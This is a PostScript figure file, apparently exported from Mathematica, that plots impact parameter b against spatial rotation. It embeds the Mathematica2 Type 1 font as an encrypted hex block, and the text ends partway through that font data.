+P +P +[ ] 0 setdash +p +0 setlinecap +450.12 157.941 m +447.223 157.941 L +s +P +p +np 451 151 m +451 165 L +460 165 L +460 151 L +cp +clip np +p +1 w +1 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 452.28 151.566 ] concat +1 w +[ ] 0 setdash +p +np -2.28 -1.566 m +-2.28 14.434 L +8.72 14.434 L +8.72 -1.566 L +cp +clip np +11.52 /Mathematica1 Msf +1 g +0.75 10.5 m +(p) N +P +[1 0 0 1 -452.28 -151.566 ] concat +1 w +[ ] 0 setdash +P +P +[ ] 0 setdash +p +0 setlinecap +450.12 105.842 m +447.223 105.842 L +s +P +p +np 451 98 m +451 113 L +468 113 L +468 98 L +cp +clip np +p +1 w +1 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 452.28 99.467 ] concat +1 w +[ ] 0 setdash +p +np -2.28 -2.467 m +-2.28 14.533 L +16.72 14.533 L +16.72 -2.467 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +11.52 /Times-Roman-MISO Msf +1 g +0 10.5 m +(2) N +11.52 /Mathematica1 Msf +9 10.5 m +(p) N +P +[1 0 0 1 -452.28 -99.467 ] concat +1 w +[ ] 0 setdash +P +P +[ ] 0 setdash +p +0 setlinecap +450.12 53.742 m +447.223 53.742 L +s +P +p +np 451 46 m +451 61 L +468 61 L +468 46 L +cp +clip np +p +1 w +1 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 452.28 47.367 ] concat +1 w +[ ] 0 setdash +p +np -2.28 -2.367 m +-2.28 14.633 L +16.72 14.633 L +16.72 -2.367 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +11.52 /Times-Roman-MISO Msf +1 g +0 10.5 m +(3) N +11.52 /Mathematica1 Msf +9 10.5 m +(p) N +P +[1 0 0 1 -452.28 -47.367 ] concat +1 w +[ ] 0 setdash +P +P +p +np 210 257 m +210 272 L +310 272 L +310 257 L +cp +clip np +p +1 w +1 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 211.235 257.578 ] concat +1 w +[ ] 0 setdash +p +np -2.235 -1.578 m +-2.235 15.422 L +99.765 15.422 L +99.765 -1.578 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +10.08 /Times-Roman-MISO Msf +p +0 9 m +(I) N +P +p +3.75 9 m +(m) N +P +p +12.75 9 m +(p) N +P +p +19.5 9 m +(a) N +P +p +24.75 9 m +(c) N +P +p +30 9 m +(t) N +P +p +36.75 9 m +(p) N +P +p +43.5 9 m +(a) N +P +p +48.75 9 m +(r) N +P +p +53.25 9 m +(a) N +P +p +58.5 9 m +(m) N +P +p +67.5 9 m +(e) N +P +p +72.75 9 m +(t) N +P +p +76.5 9 m +(e) N +P +p +81.75 9 m +(r) N +P +86.25 9 m +(,) N +92.25 9 m +(b) N +P +[1 0 0 1 -211.235 -257.578 ] concat +1 w +[ ] 0 setdash +P +P +p +np 34 75 m +34 165 L +49 165 L +49 75 L +cp +clip np +p +1 w +1 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[0 -1 1 0 35.28 164.105 ] concat +1 w +[ ] 0 setdash +p +np -1.895 -2.28 m +-1.895 14.72 L +90.105 14.72 L +90.105 -2.28 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +10.08 /Times-Roman-MISO Msf +p +0 9 m +(S) N +P +p +6 9 m +(p) N +P +p +12.75 9 m +(a) N +P +p +18 9 m +(t) N +P +p +21.75 9 m +(i) N +P +p +24.75 9 m +(a) N +P +p +30 9 m +(l) N +P +p +36 9 m +(r) N +P +p +40.5 9 m +(o) N +P +p +46.5 9 m +(t) N +P +p +50.25 9 m +(a) N +P +p +55.5 9 m +(t) N +P +p +59.25 9 m +(i) N +P +p +62.25 9 m +(o) N +P +p +68.25 9 m +(n) N +P +75 9 m +(,) N +10.08 /Mathematica1 Msf +81.75 9 m +(c) N +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +10.08 /Times-Roman-MISO Msf +P +[0 1 -1 0 164.105 -35.28 ] concat +1 w +[ ] 0 setdash +P +P +p +np 70 3 m +70 238 L +450 238 L +450 3 L +cp +clip np +p +np 117 136 m +117 152 L +155 152 L +155 136 L +cp +clip np +p +1 w +1 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 118.485 136.705 ] concat +1 w +[ ] 0 setdash +p +np -2.485 -1.705 m +-2.485 16.295 L +37.515 16.295 L +37.515 -1.705 L +cp +clip np +p +np -0.485 0.295 m +-0.485 13.295 L +35.515 13.295 L +35.515 0.295 L +cp +clip np +[1 0 0 1 0 0 ] concat +1 w +[ ] 0 setdash +p +np -2.485 -1.705 m +-2.485 15.295 L +37.515 15.295 L +37.515 -1.705 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +%%BeginResource: font Mathematica2 +%%BeginFont: Mathematica2 +%!PS-AdobeFont-1.0: Mathematica2 001.000 +%%CreationDate: 8/28/01 at 12:01 AM +%%VMusage: 1024 29061 +% Mathematica typeface design by Andre Kuzniarek. Copyright \(c\) 1996-2001 Wolfram Research, Inc. [http://www.wolfram.com]. All rights reserved. [Font version 2.00] +% ADL: 800 200 0 +%%EndComments +FontDirectory/Mathematica2 known{/Mathematica2 findfont dup/UniqueID known{dup +/UniqueID get 5095653 eq exch/FontType get 1 eq and}{pop false}ifelse +{save true}{false}ifelse}{false}ifelse +20 dict begin +/FontInfo 16 dict dup begin + /version (001.000) readonly def + /FullName (Mathematica2) readonly def + /FamilyName (Mathematica2) readonly def + /Weight (Medium) readonly def + /ItalicAngle 0 def + /isFixedPitch false def + /UnderlinePosition -133 def + /UnderlineThickness 20 def + /Notice (Mathematica typeface design by Andre Kuzniarek. Copyright \(c\) 1996-2001 Wolfram Research, Inc. [http://www.wolfram.com]. All rights reserved. [Font version 2.00]) readonly def + /em 1000 def + /ascent 800 def + /descent 200 def +end readonly def +/FontName /Mathematica2 def +/Encoding 256 array +dup 0/NUL put +dup 1/Eth put +dup 2/eth put +dup 3/Lslash put +dup 4/lslash put +dup 5/Scaron put +dup 6/scaron put +dup 7/Yacute put +dup 8/yacute put +dup 9/HT put +dup 10/LF put +dup 11/Thorn put +dup 12/thorn put +dup 13/CR put +dup 14/Zcaron put +dup 15/zcaron put +dup 16/DLE put +dup 17/DC1 put +dup 18/DC2 put +dup 19/DC3 put +dup 20/DC4 put +dup 21/onehalf put +dup 22/onequarter put +dup 23/onesuperior put +dup 24/threequarters put +dup 25/threesuperior put +dup 26/twosuperior put +dup 27/brokenbar put +dup 28/minus put +dup 29/multiply put +dup 30/RS put +dup 31/US put +dup 32/Space put +dup 33/Radical1Extens put +dup 34/Radical2 put +dup 35/Radical2Extens put +dup 36/Radical3 put +dup 37/Radical3Extens put +dup 38/Radical4 put +dup 39/Radical4Extens put +dup 40/Radical5 put +dup 41/Radical5VertExtens put +dup 42/Radical5Top put +dup 43/Radical5Extens put +dup 44/FixedFreeRadical1 put +dup 45/FixedFreeRadical2 put +dup 46/FixedFreeRadical3 put +dup 47/FixedFreeRadical4 put +dup 48/TexRad1 put +dup 49/TexRad2 put +dup 50/TexRad3 put +dup 51/TexRad4 put +dup 52/TexRad5 put +dup 53/TexRad5VertExt put +dup 54/TexRad5Top put +dup 55/TexRadExtens put +dup 56/LBrace1 put +dup 57/LBrace2 put +dup 58/LBrace3 put +dup 59/LBrace4 put +dup 60/RBrace1 put +dup 61/RBrace2 put +dup 62/RBrace3 put +dup 63/RBrace4 put +dup 64/LBracket1 put +dup 65/LBracket2 put +dup 66/LBracket3 put +dup 67/LBracket4 put +dup 68/RBracket1 put +dup 69/RBracket2 put +dup 70/RBracket3 put +dup 71/RBracket4 put +dup 72/LParen1 put +dup 73/LParen2 put +dup 74/LParen3 put +dup 75/LParen4 put +dup 76/RParen1 put +dup 77/RParen2 put +dup 78/RParen3 put +dup 79/RParen4 put +dup 80/DblLBracket1 put +dup 81/DblLBracket2 put +dup 82/DblLBracket3 put +dup 83/DblLBracket4 put +dup 84/DblRBracket1 put +dup 85/DblRBracket2 put +dup 86/DblRBracket3 put +dup 87/DblRBracket4 put +dup 88/LAngleBracket1 put +dup 89/LAngleBracket2 put +dup 90/LAngleBracket3 put +dup 91/LAngleBracket4 put +dup 92/RAngleBracket1 put +dup 93/RAngleBracket2 put +dup 94/RAngleBracket3 put +dup 95/RAngleBracket4 put +dup 96/LCeiling1 put +dup 97/LCeiling2 put +dup 98/LCeiling3 put +dup 99/LCeiling4 put +dup 100/LFloor1 put +dup 101/LFloor2 put +dup 102/LFloor3 put +dup 103/LFloor4 put +dup 104/LFlrClngExtens put +dup 105/LParenTop put +dup 106/LParenExtens put +dup 107/LParenBottom put +dup 108/LBraceTop put +dup 109/LBraceMiddle put +dup 110/LBraceBottom put +dup 111/BraceExtens put +dup 112/RCeiling1 put +dup 113/RCeiling2 put +dup 114/RCeiling3 put +dup 115/RCeiling4 put +dup 116/RFloor1 put +dup 117/RFloor2 put +dup 118/RFloor3 put +dup 119/RFloor4 put +dup 120/RFlrClngExtens put +dup 121/RParenTop put +dup 122/RParenExtens put +dup 123/RParenBottom put +dup 124/RBraceTop put +dup 125/RBraceMiddle put +dup 126/RBraceBottom put +dup 127/DEL put +dup 128/LBracketTop put +dup 129/LBracketExtens put +dup 130/LBracketBottom put +dup 131/RBracketTop put +dup 132/RBracketExtens put +dup 133/RBracketBottom put +dup 134/DblLBracketBottom put +dup 135/DblLBracketExtens put +dup 136/DblLBracketTop put +dup 137/DblRBracketBottom put +dup 138/DblRBracketExtens put +dup 139/DblRBracketTop put +dup 140/LeftHook put +dup 141/HookExt put +dup 142/RightHook put +dup 143/Radical1 put +dup 144/Slash1 put +dup 145/Slash2 put +dup 146/Slash3 put +dup 147/Slash4 put +dup 148/BackSlash1 put +dup 149/BackSlash2 put +dup 150/BackSlash3 put +dup 151/BackSlash4 put +dup 152/ContourIntegral put +dup 153/DblContInteg put +dup 154/CntrClckwContInteg put +dup 155/ClckwContInteg put +dup 156/SquareContInteg put +dup 157/UnionPlus put +dup 158/SquareIntersection put +dup 159/SquareUnion put +dup 160/LBracketBar1 put +dup 161/LBracketBar2 put +dup 162/LBracketBar3 put +dup 163/LBracketBar4 put +dup 164/RBracketBar1 put +dup 165/RBracketBar2 put +dup 166/RBracketBar3 put +dup 167/RBracketBar4 put +dup 168/ContourIntegral2 put +dup 169/DblContInteg2 put +dup 170/CntrClckwContInteg2 put +dup 171/ClckwContInteg2 put +dup 172/SquareContInteg2 put +dup 173/UnionPlus2 put +dup 174/SquareIntersection2 put +dup 175/SquareUnion2 put +dup 176/DblLBracketBar1 put +dup 177/DblLBracketBar2 put +dup 178/DblLBracketBar3 put +dup 179/DblLBracketBar4 put +dup 180/DblRBracketBar1 put +dup 181/DblRBracketBar2 put +dup 182/DblRBracketBar3 put +dup 183/DblRBracketBar4 put +dup 184/ContourIntegral3 put +dup 185/DblContInteg3 put +dup 186/CntrClckwContInteg3 put +dup 187/ClckwContInteg3 put +dup 188/SquareContInteg3 put +dup 189/UnionPlus3 put +dup 190/SquareIntersection3 put +dup 191/SquareUnion3 put +dup 192/DblBar1 put +dup 193/DblBar2 put +dup 194/DblBar3 put +dup 195/DblBar4 put +dup 196/BarExt put +dup 197/DblBarExt put +dup 198/OverCircle put +dup 199/Hacek put +dup 200/VertBar1 put +dup 201/VertBar2 put +dup 202/Nbspace put +dup 203/VertBar3 put +dup 204/VertBar4 put +dup 205/FIntegral put +dup 206/FIntegral2 put +dup 207/FIntegral3 put +dup 208/OverDoubleDot put +dup 209/OverTripleDot put +dup 210/OverLVector put +dup 211/OverRVector put +dup 212/OverLRVector put +dup 213/OverLArrow put +dup 214/OverArrowVectExt put +dup 215/OverRArrow put +dup 216/OverLRArrow put +dup 217/Integral put +dup 218/Summation put +dup 219/Product put +dup 220/Intersection put +dup 221/Union put +dup 222/LogicalOr put +dup 223/LogicalAnd put +dup 224/Integral1 put +dup 225/Integral2 put +dup 226/Sum1 put +dup 227/Sum2 put +dup 228/Product1 put +dup 229/Product2 put +dup 230/Union1 put +dup 231/Union2 put +dup 232/Intersect1 put +dup 233/Intersect2 put +dup 234/Or1 put +dup 235/Or2 put +dup 236/And1 put +dup 237/And2 put +dup 238/SmallVee put +dup 239/SmallWedge put +dup 240/DoubleGrave put +dup 241/Breve put +dup 242/DownBreve put +dup 243/OverTilde put +dup 244/Tilde2 put +dup 245/Tilde3 put +dup 246/Tilde4 put +dup 247/BackQuote put +dup 248/DblBackQuote put +dup 249/Quote put +dup 250/DblQuote put +dup 251/VertBar put +dup 252/DblVertBar put +dup 253/VertBarExten put +dup 254/DblVertBarExten put +dup 255/Coproduct put + readonly def +/PaintType 0 def +/FontType 1 def +/StrokeWidth 0 def +/FontMatrix[0.001 0 0 0.001 0 0]readonly def +/UniqueID 5095653 def +/FontBBox{-13 -4075 2499 2436}readonly def +currentdict end +currentfile eexec +D8061D93A8246509E76A3EC656E953B7C22E43117F5A3BC2421790057C314DAE3EFBFF49F45DD7CD +91B890E4155C4895C5126A36B01A58FDB2004471266DA05A0931953736AD8B3DEB3BCB2A24BC816A +C1C90A1577C96B9096D6F51F9E21E625ADF6C3A49867A632A605C117E6325C820121799F412E226B +EFE61F2813676F172CBD7EC10FF1EFBB92DF3A88E9378921BBD00E6024CC08EF057CECD09B824E0A +CCDAA4644296DE34D19D779A21C30666026829D38FB35A2284CAED23C8B913E7B28BB3DA7C8CE390 +4C0BAE30B0287680CCCAB2E6D4CAB2E7D786ABF54068028FD7D94FAC236094761B62B7E76F68D2BE +58C23AF85001950EFC1A9C1BB71520B78DDF6AA0058D25D041E86D01878DF56A5C48D74DCB2BBD68 +D75C94A3CE878484D28049331CE3D4364B40FAA2C754E8F443D244C5BC44B1C7868E36EAF4F7EF1F +6CB81E6CF63FABD65C29A991EB7D724DA06535AE43F3D0E2D04F6113B493C15463B4CEBFB72AB879 +7E4645F9CC0BB17E02A9626BEA4B4259F798B53B18DF2ACCF2B86BF2209CF0265DE0A46869333F98 +CCF70BF2C9239A0ABD2E97923AA5695BAFEA31E27B8F532BAA45F2980A11D069265A5312A260A627 +A765C4A08897E5C500990AE6FDA4CD6D575905468417297380EB6400CB2CF001C4B8EB79811CD8D7 +C173A337922B99DAB1048D5D03C78F78F36FEE31673D8C5FF8AD689A63AEA055CA705DB47D3AF965 +73571985E62F63866018C96EC4CA7E735C9294D8C81C03806D23CB87C0C08F86F5FA68CFC9AE48F6 +958AE016DCE4D60EB64AEAAD59D8A2592BC398BCA479FBC2F0C20C3E7F730481494C88781A6A9E0E +4F47A94619A3841FAC76A4FB252EB6FB43628AE1A4944539B1DFF672940AA5E93FFACFAC04624EF6 +7ED9C691788F0004DB7FFD1C995F2C52C0042F02F5C789F85D9E51716F3B4EDB21D4B9E660E4A892 +B747201EEC6DD6A8881FA3039664061094D1892108A2AD068D7F0251BFA72D874ECB2F42D27CC343 +052156F6A3A66D2CA6DAEF046A433FD54FEB4410315690971D0F43363EC0119B21F4BE3DFDC8C28D +BF5D68F145D3AC932EE62C32DFDEB1C48C2455392193268C893093BF911645986607DD13D8285895 +1854A7FF81FC98ADD44742907818B3C8E3187371BD9FE6EF5B4315E82C359BF2EA91D2894EE7FD9A +734BF2745D7FE8D08D29DA2A03176C992E11F1AADCE219D5E33F325BCFF4521D6D04E61B913B6C41 +740AF8BD9EA83F3AE7C4E5402366A812B1724431EE78D2028317B975E91941B591CC6C97740C453C +C7D7AB3CE97AE2F4DFAB6B9C8810A52A276BEAABD687BDA0971EE623A40B7AD6A8E69ED8BE63959D +3DCF8799E2505AC7F7B0E2FFECB0B08027A6266B7F96311B0AD78B7B6C78392AA062A73FDF179FEC +7F748929D060289F899FE417D4028FF332204FE04146BB130EF05FB57AF4BF9337EF71094DC5922E +3EF2D6A9F8257AF242019C349B65C2A3972ACA842D14EAB6A8D287456C9D7D295198F4AB7632EE43 +7D006B8124A80BBF26C1B902379D7F90080B51F982630E27B6031CE20930C273EA5D7FF0FC7E996E +67B072796CD96A7739444D21FE10DE7B57D143E4155EEE1B89F32EBCBF4C64D6D3FA1C46E06C9E9F +F99BC9BBCC61A400C7DBF812C42AAED863FE9EE3B02E731D1809F3CAB941252DE486BFE641F60F60 +C788F68519A6B04A4D6F50F02F93C6B8774B960C1FE893373D2AC2D865C487CFFE7669E1F1E73630 +7D34C15835F0453C8B0C1AE352CE1F27065F1082E6C84F86330F76B39C246315D6996AB69F81A020 +30D92CCB4C2A5AA4F4B3CAC88B2C8C9C621294A5EAB6AC3778DB99BD2F411735DC1421861417B4FD +399B365AEA45185A3D9D687546E36BB73994FB7FA3EE890AE3734BD9381B0E7AE514E8C517B87268 +7364C38D0A8379039F33336799205F2F54BBF7C2E9B30B27BCFB9FF2CD64F5D700F2455EE66B6252 +6E79ED2B0E5FF9732281CA50D27A93F259B6D4B5C7F856BB7D4F2E0F7741FA2419BBAF86C372E34D +59BC7AABC4CEF4F47EE40E118AB95A4863E16C55824D34002D59844D1F51B5DC6FB6BB5D595C4404 +1E05A84FD453A129279F894D726F6CD53BA3E234518324C5F715DAE6E7B5695326FC0C9B6CA2B53D +B25EC76BE9662388058629E70DC7BD861E188F1FF32A754A455195163CB4754D116D24E6A6300B67 +1862625E260442DEA2505E36D5F7AA4AD1FEB3B42632E382959C7E84569B2A790A0D0A208C2D4816 +AD28046B42C7A4797D424277AD9425C04DB87DCF112AE431CFFF6E4FFA979E947502AE5E1755C112 +0AE2361888B956F3F513A5975680E6E8374D8BF26C32AADC826D729E9026B14A68BC3D065E11C697 +D4D474CF963AFE083DD7D9278A0C27447E25AD70DD40B2EBAB8040164E11CD75AE3125C29806DEF4 +AD1B989F7001E227685DEF6EBE3287DE43BBA5FE2123A0EC835AECF879C13F7CFDC409901F291E89 +06C26E42B189862AFAE029F03D86D35E44E318FE16537E2B73E4F39F1E6945A3A6432438DCB6D2B2 +09814B5228D08165568617C279499ECA1B88C90300F1C88C45D4BE3DC726A59E24B46C5B2FF228C6 +E6645819C6F1D5B05737BE7353F4787EE52A21DC47A44F3C44406E79BBFDDC164682B02F4C39300D +12EF37A58E317FC1B8CE58E04BE666ED5DA75DBF752BEDDA4C7491E4D6922BCCA9CF421CE6751002 +8638EF643119841F423626D6B19A5D2CFB193B093D7646913F64614C098E5F5FF9422EBA75FA9AA8 +4F8ED114AEAB011E6F0727FB96F26BECBBAFE3AA8D0ABC5A8E9906B6CBB9E03F8CC4FCA97C884B83 +7CC33C619CD3195C55633B72D3F2D45561CD226F42B859B8099812D591886FA851107A185169FA7C +944248DE28642FA3043FF3B60236BFD781257C6FE4D56174AD16ABBF9659C05F08673A70496A0787 +C187D4367CB0CF48BD9A4FE0E481273E4909A1092626A13917DCBDE920028B06E094F5B28887B990 +32521E1720B75EB284AA6FFE53FA5CD5B903F951FCF7B33CC981FE7BCC4BDF4907ACC3AA60B69969 +A9AF204C84EC8C0F5DCB8A85E39EA9F2D4B67095A44CA0C8B072D7A61F3015D502B1A0F660C22221 +3231986D5E8C04AECBAFE999D1735A80051C06CA279D0FF6215633FB7A706454DA7236DB17AD72EE +1F6044A26A0EB77AB3BCE823E3F5E0DD31ACB029A1D17665FF16E5D1ACDDFD83CAEE1D48666D7BC6 +DADC34D317C335855D118892CBD32412F5870C3D2E599A46AA997A5E2BBDD3001C2957D81345DBED +583B72C4FB356F0C872A31A35087775EF18601930C0874EEA1ACB3ED3690EF447926439CC383087C +C9D5C6EB21EDF5941CB4E99FDA434A91676D76DC1A1BD801EECA6B0A88370B7005D41A1253CF8217 +1285986DC302B51123DBA9733BDEF0361AE0580FE6FBA5F29CF1438801586559D7436436CFE33E6A +D6EFA850BB8C9382E1A068246F370388186DC278F31F770C2C96881AC6E40823B24D6D536514A2C7 +AF3D159621080442592CAC03D6967BCBDB38FCA1A45F76F1A10027F1DCC076533C6AFC097FBCF0DA +A0078BE0828247F938AF76A87EFC14D9F5444CBCDCE637E2325D86B9D99D1ED70F44194E19F6C7A9 +9E415DC8A6E484DAAE52AAC1307A5353E8F649A35214B3F43DB5F3DB3ED06580A570E60B3E52679F +F90A3B00D4EB4DFBCF0D2F9C5545A6DE10BCC849A0BA9E18F29C6F09ED0F0DD48AD37B7925654433 +A6D02965A3813BA2EAB2E6C2004ADD216DAE99471EE518BD0DA0F534F1512A8E26286B07FEDE71E6 +0A5A057A22AEF095A8B4752F54C04CB8BC170F3D6B725B83A6780176194B21BA906E37B7923E2548 +604F8DB18E0A3E1B5FF04D00898C29C6033DAC54637CF5B068291559D8526D5201F3503FBA4EE12D +D7A6CF6271618F41FE08384521CD771FA80364D747430A071EE3D3ABDB5400DD36A0285430D537FA +F6EF8ACAF85C250D6652F327B2BD3B29E1C64E6E66C788FF1D9C3AC6DD38691CDECD0F3FF4079BAD +A2BC0CBE14AA3FCC38E3F31B3298A6995C87B34A7245ABA2C968F908D8337860507569C370654635 +570615F987531551414B5CCAF7F4D0B38F701619C553E746BD90655294270560046A925A021C98F9 +3EA8FF5B5B8A0D05AD483E6DDC5257635308C6C0FE9182D0E4FB011A00981A7B95DB5BF5A82F8B1E +B68E8822F8B1B7CF01AF11302B44307F3A71D5EB3465F793CAEB1E72D2C63E3D264380A75FF1DDA5 +00B5F82B04179EA9DAC10731FDEDF5913EFDEDDF5799D2A86EF2D16C0B52D99FCEAD392E9226AA6D +3D11D29054130C8602F703CB1EBDAAA089A02C0EBD53343A7B297836CB63E4B2C33C8760ECEB15E5 +6B59D4B296B8B724244D37651C3CB862C7135D62B2692F5A27B9374C5C3C5399E5C4DCCD76572294 +F742B1F545B736BF4C82D8F4E2941CD52C0B944261DD4CCF8A968B646662F3D187557206FF165F3C +0D3D5CA1E428D61D7936E1D00C5377A047EE80E0A5612F7FDEBB8B224270ED23A031A049E8676516 +BF66EBAFCF3F9D4975B0F212FB7A914EE45640972B61AE8E60E602DC7C20758BC07A159B08862F16 +6302D8CBEF03C4B0C73BD8504EB5B14DBC64FBDDC867FE51F76099769A7BD4FA4CF4096EAAAFD55F +9A20F6D4B84D8FD139112A43204026F15F9FF5AB6729537CCDA60369C24D7EFF4B6B971EBF0BD277 +A9AD1BF1066508A0A7DD9A8D45447A39B92D6B0F7DA4BEC2689D25F35C8C490891F053F90DEE5E2D +8C9D7FD1E23D0F1C5F57921BDB13BC9B8C3CED4FC42C4DDBF0706985A0DDABCC683FF5EA8416C225 +ABD219024432E3972C3314C30A672FD21523C83D93B2AC8D1DF023EEB1BD74E825FCD19873E63A45 +F6935E6685CF5EF472191B976F9EED2A4765E1B21B46EE1C4CB90AE89DA48E52BC4EDBAC2C855A67 +CB0BE9160F3126151CD171081192D0D6CB27E4EB2D725F31AE95FB283149F53F22BD8E414354D4BB +56724057601FE4BF34A5B188C00B0E550639CD796CC66EF895AA5315BEAD49B5639EF0878CDF2CA4 +271027678693EA212D0C11A6EA52F748AD0F62A0336BEC8497EE933EEC461E461CCD2F5291B980E2 +8B7D66690B10EEBE22B092179396EEF5D00E42E6CB73BAD4485F2063AEA6B6207E136ABB925332C2 +60F12D8B60B211A9BB15F37F42F53AC2559F5A8397DDD491D314B6DB0B50E41F0AA0A42FFDD5B9F3 +FBD8EFB7E343C06F793DA6BBEE4FAAFB233C31EAA3AD701B1F1C4F2FB05A7647439D19CC856C7D98 +EB3375B3ED2255FA33D9ACB87C1937E0B7F34C9B299C8D2A7F85D41141C598F9505C72B5AC2DE9BD +E24CDAE1DEE416786B93D4EE713E437D2C4A3251A296B785C81A8232F98ADD04B3D2B41394F8BDEA +7B602A555EDBD51A088C2277D8E86B08A0D05CB6142E33E973BB3F2CE841D323ABE6FBBF83B84272 +220F569DE23264AB672C2590D4527A29510E7F289DC2193E66FF23D83703E27E9E81572E7534B1DA +510BB846576E8A39D9CF44483F297C92317ED8E46237B3D73844B3B19D37831B44EC116CBAC3F75B +B67928C4D4E741EC95E96FAD74D852220F4F1A8FDCD273E0F6E77F09EFD5723CCA1398A021FAE947 +9CAC5922DAC8E2F46704BC216C7BCC1575A455CCE2C2A080B9FDCD0758D9D921EEB6DF96C64A31D1 +C9BEA80F48461857ED7DB635A3BABB3BB6155E835E605B09E06A2AAF6BF3EA70B8C0E098CD1A818E +30B9A4AADC284EE2B87E945B717FA73AFF5FB788E51827F6FBE319ADDD059614B493ECCE718789A2 +EB0F117EC811EC38A3F4EDEACA660612BD247425A3FB2E6022CC14FDF69B6660B37FCD4359F1BA54 +D12B1F478D76CF898824762C25A026B01C94752F6F3724C31AE788CFE992D9CA152902EEBC4AD8B7 +A5F0E68A5A0408A2F0BA71CE0D94B4A905B35F2781D7E7A2712DC62E87518BFE72A5BC4A9F36A4B3 +B1494B0C4C14705203762E0CD0B28BE31234449C7655B5D6165D7CC4A16431F7A8ECA58D25711E98 +4FF2CE123C05AF9A65D478B73739715DE62A199D47BAC65785EE1DD25AF91868F91D037C0AD754BA +CE3DC4B67F1FDCA8FD9FA39796EFA9C975DBFAA99DB70624B3563408D0048E3AAC6B4F228DC0AC08 +B9C2B63657EEDB53B46D157426A3B4B4B8CC5B4F30BC24CF9BED442DB51F3C7A0656DFBEFA401E1E +0823065499C69D51C477360FD13ACA8896A8117789C4561F3D85F3A80D18E39F1D6BF76C7876922A +1038ADAFD53F2D092369B356D0CA3FE6A27D7B9BD3985C78424C21E60F6BB46408013DFD7A30D320 +EAD9AC6E5FD36655AC6706666A76F1E426640C4B0BE692E4879991EA9EDF4596C0DDF43D4E370360 +D91E8B2839D368DA2A910AA6092337E2E20DEECF43D583CF164881079ED5A492B5EFCC1CAF91512E +0FEA8140CA3E2553733D6F743728ACAC3E643394015967DAC8839D5A804503A45DBC539FB8656D75 +2F00EECF73E7EC8746CB13F438CAFD554C01150048F758573903B0B3260AEDD78BC2EE87D201E219 +486315A4C01D95DAAB54335A4F2CAFC3F43F12A9574CD2DECCBC1858406C701EE62C281A55B729DC +EBBE74FDFF275A0A7B8B22C7490187D1839F4FF271723C140095F28221C4145C9061F9A5B3EDF8D2 +9E0DA04D9A8AF6ECD42DB897DD5C9318D636FAB698554BD9EF9B0902BFD8C96CB958773A3C4A5FCE +8A334C673206C39277E45AB50DA2661F89D621AF057CF1A7ECDE344DC7658514B4C655937E7BE010 +B0694B069FF64D5582E3A4B7F6AF6C96D056ABB20CC883AB25A9BEABB18A84F0258CA3E4F33FFB77 +9841F5970DB447969FE9C6BFDB066ACBC040648D74F553EE434BADC353450A3792EEF9CFDB2FBCD6 +07153F2EF73C1BCCE3784609F26C80193BAEF766E7CC7C33A4CAB862E6E01FC1CDF11E2FBF25FE1D +308CFF9CD924893861BABF78F762F3CADD3E0BEB38F6157CD08F1B8767606427C4A631AFC9488E6D +4D1A8F4B51ED48582BCD3089BE037ECFF18DF6175EC317EA56D4FDE37288F089532C13F7B3C1EF7D +333E7FAF8B49D95F535F60889CD7245E5CB0BEBFDAE8F7A0AC1AB7DA18F2BC06267B27403F1BAD9F +DF5F13254E96C294C4568EC7154479570E514A55208D19A4538959F7C5B2A0C9CFE4B4A40300F248 +5943C6AAB753F3F0E551727B8DA8E75305A9CE623757B36FB7D34D13CB14EE561C404CDB2D88F375 +2BBFD9FDBCC92CF110D6C35629E3040D995CD25B90BED2CE79BBDC846EAA321B1BC46DFF7845380F +BF08782D6A31EC7D41F251786FDE403A39626D6052D5189CFBB3DCFF09E81C09D0CE7D571F979509 +79B26AA4F6D07F97A33522306AD692D4D960CEF1CEA3D251A841E2A23C7AE3EA44B3F31E79808F22 +B6ED20DEE4186927394624E22D37E873B660BB8DE6FFAE058DD5817A3BBD68963D055D406F253701 +D940B5E58DAB01FDFF1C626D0D35E8E7995D37057DD07F6D4D45F152A141269A7FB81433652209B2 +B23D69BB5D8D367D95D4A94B2C2924FB83F50F651458CABCB65009912F00F485A924A61A0008DB44 +D478CAFDB7D9524204947703B822755A1301FE163A8248C8AED7073362D918D097597B24A3B579DF +FE00F47776428D2B992E1F5FAD6190ADD1C789BB9A913BB1B938EDE357BB436F734477F7BF332E36 +7C380D049AED8687B4C2AB6EB813E719718C9CE62296C24F783B16E9635A7E4402840BD26D3A0DA5 +78050C49E6D8239EBE9E053719BE94CF6D8C7942AE1660F28B21B3C1E6E15459C1FEEA4FAAE64AA7 +165824F7B939E28E51009FB778E370C6001B3F546EBB76454912D730A3F8C7F6F9EC01B9F90A2E5E +58EFF9EA99BE57A0154147C2B7A7C7E493E37C9BD0ECDEAD4AA4DBFF95D7E451246C9D4C30E71F4D +76441A297A1223FD2F8E017B10C108B0F0F67385060E9C18133A6264AB2B445F6DBCE86CA803357D +749244A6FFD8FF8AD37EBAF3787F3702764C5EE2CA7547D7A9FED5AECDD2064F7C767078579DE13C +F135CB05561B15BD9803646611422353774984D386BAD640C5EED157569356A17BB6233EB298960B +8E34209562AE170A08D15F3A29967DE067F6AD183BA1EB49A99F4899031A01410D7311BB9B7A984E +BD6A303D44CF42B40F12769D44160583BCD68C68F823DDC0D73150083404B12AAA68E97206053C6D +23FF0620231D3570A089520E928E980F56A273092DF94EB3A99FBFD877B58860231B2A761DC91A41 +A427778B06F07D4F78924FF986F837C1437B44EAD5E7C56B9CE9CCFC0F6ABDBFDBDE4A32E3FFF336 +7F7194DA20D038CC44C4413B2CAC15C05B22758569D1008EA057DCDCF4A324C924021B35B10ED632 